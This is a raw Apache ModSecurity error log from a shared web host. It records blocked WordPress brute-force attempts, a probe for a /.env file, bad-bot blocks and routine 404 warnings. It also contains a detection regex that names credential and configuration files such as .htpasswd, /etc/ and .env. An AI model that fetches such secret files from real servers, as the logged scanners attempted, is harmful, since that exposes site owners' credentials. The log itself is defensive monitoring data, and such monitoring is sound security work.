[Tue May 26 13:35:59.578815 2026] [security2:error] [pid 536875:tid 537102] [client 34.150.254.2:51814] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "gciamd.org.in.svijaykumar.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVUZ-r_-FTveSGlx1HTSQAAAOY"]
[Tue May 26 13:36:01.416261 2026] [security2:error] [pid 536875:tid 537025] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUaOr_-FTveSGlx1HTagAAAJk"]
[Tue May 26 13:36:03.152838 2026] [security2:error] [pid 536875:tid 537109] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUaur_-FTveSGlx1HTjQAAAO0"]
[Tue May 26 13:36:03.602152 2026] [security2:error] [pid 536875:tid 537106] [client 176.65.139.233:24390] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.subbroker.bloggertarget.com"] [uri "/.env"] [unique_id "ahVUa-r_-FTveSGlx1HTpgAAAOo"]
[Tue May 26 13:36:05.718193 2026] [security2:error] [pid 536875:tid 537015] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUber_-FTveSGlx1HTywAAAI8"]
[Tue May 26 13:36:06.927418 2026] [security2:error] [pid 536875:tid 537084] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUbur_-FTveSGlx1HT4QAAANQ"]
[Tue May 26 13:36:08.910754 2026] [security2:error] [pid 536875:tid 537106] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUcOr_-FTveSGlx1HUJwAAAOo"]
[Tue May 26 13:36:11.782179 2026] [security2:error] [pid 536875:tid 537030] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUc-r_-FTveSGlx1HUYgAAAJ4"]
[Tue May 26 13:36:12.444582 2026] [security2:error] [pid 536875:tid 537131] [client 114.119.158.6:44081] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "crusties.agsnails.com"] [uri "/ucxcuo/saugus-police-scanner-app"] [unique_id "ahVUdOr_-FTveSGlx1HUhQAAAQM"], referer: https://crusties.agsnails.com/ucxcuo/saugus-police-scanner-app
[Tue May 26 13:36:12.577574 2026] [security2:error] [pid 536875:tid 536980] [remote 121.37.96.207:49980] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "canopykaapi.com"] [uri "/index.php"] [unique_id "ahVUcOr_-FTveSGlx1HULAAA72g"], referer: https://canopykaapi.com/wp-content/cache/speedycache/canopykaapi.com/assets/9c93b12bc8cba040-9c93b12bc8cba040-combined.css
[Tue May 26 13:36:13.618096 2026] [security2:error] [pid 536875:tid 537008] [client 146.174.190.73:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUder_-FTveSGlx1HUlwAAAIg"]
[Tue May 26 13:36:13.875334 2026] [security2:error] [pid 536875:tid 537080] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUder_-FTveSGlx1HUnQAAANA"]
[Tue May 26 13:36:16.062555 2026] [security2:error] [pid 536875:tid 537029] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUd-r_-FTveSGlx1HU1AAAAJ0"]
[Tue May 26 13:36:17.471771 2026] [security2:error] [pid 536875:tid 537107] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUeer_-FTveSGlx1HU-AAAAOs"]
[Tue May 26 13:36:19.623516 2026] [security2:error] [pid 536875:tid 537046] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUe-r_-FTveSGlx1HVOQAAAK4"]
[Tue May 26 13:36:22.279969 2026] [security2:error] [pid 536875:tid 537106] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUfer_-FTveSGlx1HVhwAAAOo"]
[Tue May 26 13:36:23.102464 2026] [security2:error] [pid 536875:tid 537007] [client 43.172.197.91:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVUf-r_-FTveSGlx1HVswAAAIc"]
[Tue May 26 13:36:23.650456 2026] [security2:error] [pid 536875:tid 537061] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUf-r_-FTveSGlx1HVuQAAAL0"]
[Tue May 26 13:36:24.650004 2026] [security2:error] [pid 536875:tid 536993] [remote 74.7.241.58:44218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVUgOr_-FTveSGlx1HV6AAA4nU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/wpforms-lite/templates/admin/splash
[Tue May 26 13:36:25.194937 2026] [security2:error] [pid 536875:tid 536994] [remote 213.246.101.88:52460] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.101.246.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVUger_-FTveSGlx1HV7gAAh3Y"]
[Tue May 26 13:36:26.442298 2026] [security2:error] [pid 536875:tid 537106] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUger_-FTveSGlx1HWBwAAAOo"]
[Tue May 26 13:36:27.637542 2026] [proxy:warn] [pid 536875:tid 537082] [client 167.94.146.59:18198] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 13:36:27.637582 2026] [proxy:error] [pid 536875:tid 537082] (70014)End of file found: [client 167.94.146.59:18198] AH01095: prefetch request body failed to 127.0.0.1:8080 (127.0.0.1) from 167.94.146.59 ()
[Tue May 26 13:36:28.568019 2026] [security2:error] [pid 536875:tid 537107] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUhOr_-FTveSGlx1HWRAAAAOs"]
[Tue May 26 13:36:30.527916 2026] [security2:error] [pid 536875:tid 537128] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUhur_-FTveSGlx1HWggAAAQA"]
[Tue May 26 13:36:31.984828 2026] [security2:error] [pid 536875:tid 537072] [client 185.191.171.13:63860] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/holiday/list/"] [unique_id "ahVUh-r_-FTveSGlx1HWqwAAAMg"]
[Tue May 26 13:36:31.984957 2026] [security2:error] [pid 536875:tid 537072] [client 185.191.171.13:63860] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/holiday/list/"] [unique_id "ahVUh-r_-FTveSGlx1HWqwAAAMg"]
[Tue May 26 13:36:32.726789 2026] [security2:error] [pid 536875:tid 537071] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUiOr_-FTveSGlx1HWtQAAAMc"]
[Tue May 26 13:36:33.700917 2026] [security2:error] [pid 536875:tid 536949] [remote 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVUier_-FTveSGlx1HW4AAA1Uk"]
[Tue May 26 13:36:33.701151 2026] [security2:error] [pid 536875:tid 537085] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVUier_-FTveSGlx1HW4AAA1Uk"]
[Tue May 26 13:36:33.731301 2026] [security2:error] [pid 536875:tid 537066] [client 208.91.198.85:34434] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahVUier_-FTveSGlx1HW4QAAAMI"]
[Tue May 26 13:36:34.519551 2026] [security2:error] [pid 536875:tid 537101] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUiur_-FTveSGlx1HW7gAAAOU"]
[Tue May 26 13:36:35.299826 2026] [security2:error] [pid 536875:tid 536968] [remote 121.200.216.55:34338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVUi-r_-FTveSGlx1HXBQAA01w"]
[Tue May 26 13:36:36.170008 2026] [security2:error] [pid 536875:tid 537125] [client 178.20.210.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVUi-r_-FTveSGlx1HXEAAAAP0"]
[Tue May 26 13:36:36.620349 2026] [security2:error] [pid 536875:tid 537068] [client 167.94.146.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahVUjOr_-FTveSGlx1HXJgAAAMQ"]
[Tue May 26 13:36:36.747784 2026] [security2:error] [pid 536875:tid 537011] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUjOr_-FTveSGlx1HXKQAAAIs"]
[Tue May 26 13:36:36.780369 2026] [security2:error] [pid 536875:tid 537041] [client 146.174.187.206:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUjOr_-FTveSGlx1HXLwAAAKk"]
[Tue May 26 13:36:36.974324 2026] [security2:error] [pid 536875:tid 536970] [remote 54.38.29.86:40530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVUjOr_-FTveSGlx1HXNgAAl14"]
[Tue May 26 13:36:37.079418 2026] [security2:error] [pid 536875:tid 537100] [client 2409:408b:c33:439c:dd05:250a:4ba9:ec42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVUi-r_-FTveSGlx1HXGgAA5E0"], referer: https://kingsclub.in/billiards/
[Tue May 26 13:36:37.211683 2026] [security2:error] [pid 536875:tid 537071] [client 178.20.210.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.vcresco.com"] [uri "/index.php"] [unique_id "ahVUjer_-FTveSGlx1HXQAAAAMc"], referer: https://vcresco.com/wp-content/plugins/divi-form-builder/changelog.txt
[Tue May 26 13:36:37.485804 2026] [security2:error] [pid 536875:tid 537018] [client 178.20.210.57:7846] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVUjer_-FTveSGlx1HXSQAAkmc"]
[Tue May 26 13:36:37.700453 2026] [security2:error] [pid 536875:tid 537091] [client 178.20.210.57:7852] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.vcresco.com"] [uri "/index.php"] [unique_id "ahVUjer_-FTveSGlx1HXTAAA208"], referer: https://vcresco.com/wp-content/plugins/divi-form-builder/styles/style.min.css
[Tue May 26 13:36:38.549879 2026] [security2:error] [pid 536875:tid 537039] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUjur_-FTveSGlx1HXWQAAAKc"]
[Tue May 26 13:36:40.640754 2026] [security2:error] [pid 536875:tid 537111] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUkOr_-FTveSGlx1HXigAAAO8"]
[Tue May 26 13:36:43.046413 2026] [security2:error] [pid 536875:tid 537112] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUkur_-FTveSGlx1HXzwAAAPA"]
[Tue May 26 13:36:45.222303 2026] [security2:error] [pid 536875:tid 537044] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUlOr_-FTveSGlx1HYDgAAAKw"]
[Tue May 26 13:36:45.996343 2026] [security2:error] [pid 536875:tid 537036] [client 199.120.14.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVUler_-FTveSGlx1HYIwAAAKQ"]
[Tue May 26 13:36:47.440244 2026] [security2:error] [pid 536875:tid 537124] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUl-r_-FTveSGlx1HYTwAAAPw"]
[Tue May 26 13:36:49.331928 2026] [security2:error] [pid 536875:tid 537064] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUmOr_-FTveSGlx1HYiAAAAMA"]
[Tue May 26 13:36:51.411216 2026] [security2:error] [pid 536875:tid 537116] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUm-r_-FTveSGlx1HYwQAAAPQ"]
[Tue May 26 13:36:53.633463 2026] [security2:error] [pid 536875:tid 537074] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUner_-FTveSGlx1HY9wAAAMo"]
[Tue May 26 13:36:54.139539 2026] [security2:error] [pid 536875:tid 537122] [client 66.249.64.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVUnur_-FTveSGlx1HZFAAAAPo"]
[Tue May 26 13:36:54.139922 2026] [security2:error] [pid 536875:tid 537101] [client 66.249.64.110:59259] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVUner_-FTveSGlx1HZDgAAAOU"]
[Tue May 26 13:36:55.674323 2026] [security2:error] [pid 536875:tid 537110] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUn-r_-FTveSGlx1HZOQAAAO4"]
[Tue May 26 13:36:56.672933 2026] [security2:error] [pid 536875:tid 537126] [client 152.58.145.31:44816] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "samayikprasanga.in"] [uri "/ajaxprov/login.php"] [unique_id "ahVUoOr_-FTveSGlx1HZTgAA_m8"], referer: https://samayikprasanga.in/control/control.php
[Tue May 26 13:36:57.188823 2026] [security2:error] [pid 536875:tid 537050] [client 18.192.166.72:55708] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVUoer_-FTveSGlx1HZYwAAALI"], referer: https://thegoodsporting.com
[Tue May 26 13:36:57.776715 2026] [security2:error] [pid 536875:tid 537099] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUoer_-FTveSGlx1HZawAAAOM"]
[Tue May 26 13:36:59.148499 2026] [security2:error] [pid 536875:tid 537046] [client 146.174.162.114:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUour_-FTveSGlx1HZpgAAAK4"]
[Tue May 26 13:36:59.201831 2026] [security2:error] [pid 536875:tid 537084] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUour_-FTveSGlx1HZrAAAANQ"]
[Tue May 26 13:37:02.029767 2026] [security2:error] [pid 536875:tid 537083] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUper_-FTveSGlx1HaBwAAANM"]
[Tue May 26 13:37:04.043370 2026] [security2:error] [pid 536875:tid 536954] [remote 37.60.246.58:49102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.246.60.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVUp-r_-FTveSGlx1HaSQABAU4"]
[Tue May 26 13:37:04.050281 2026] [security2:error] [pid 536875:tid 537008] [client 64.233.173.102:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVUpur_-FTveSGlx1HaHQAAAIg"]
[Tue May 26 13:37:04.120898 2026] [security2:error] [pid 536875:tid 537027] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUp-r_-FTveSGlx1HaRAAAAJs"]
[Tue May 26 13:37:04.312262 2026] [security2:error] [pid 536875:tid 537100] [client 114.119.136.72:56645] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/sitemap-pt-portfolio-2014-05.html"] [unique_id "ahVUqOr_-FTveSGlx1HaVAAAAOQ"], referer: http://www.anujtradingco.com/sitemap.html
[Tue May 26 13:37:06.225615 2026] [security2:error] [pid 536875:tid 537075] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUqer_-FTveSGlx1HaegAAAMs"]
[Tue May 26 13:37:06.715785 2026] [security2:error] [pid 536875:tid 536972] [remote 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVUqur_-FTveSGlx1HakQAAxmA"]
[Tue May 26 13:37:06.715951 2026] [security2:error] [pid 536875:tid 537070] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVUqur_-FTveSGlx1HakQAAxmA"]
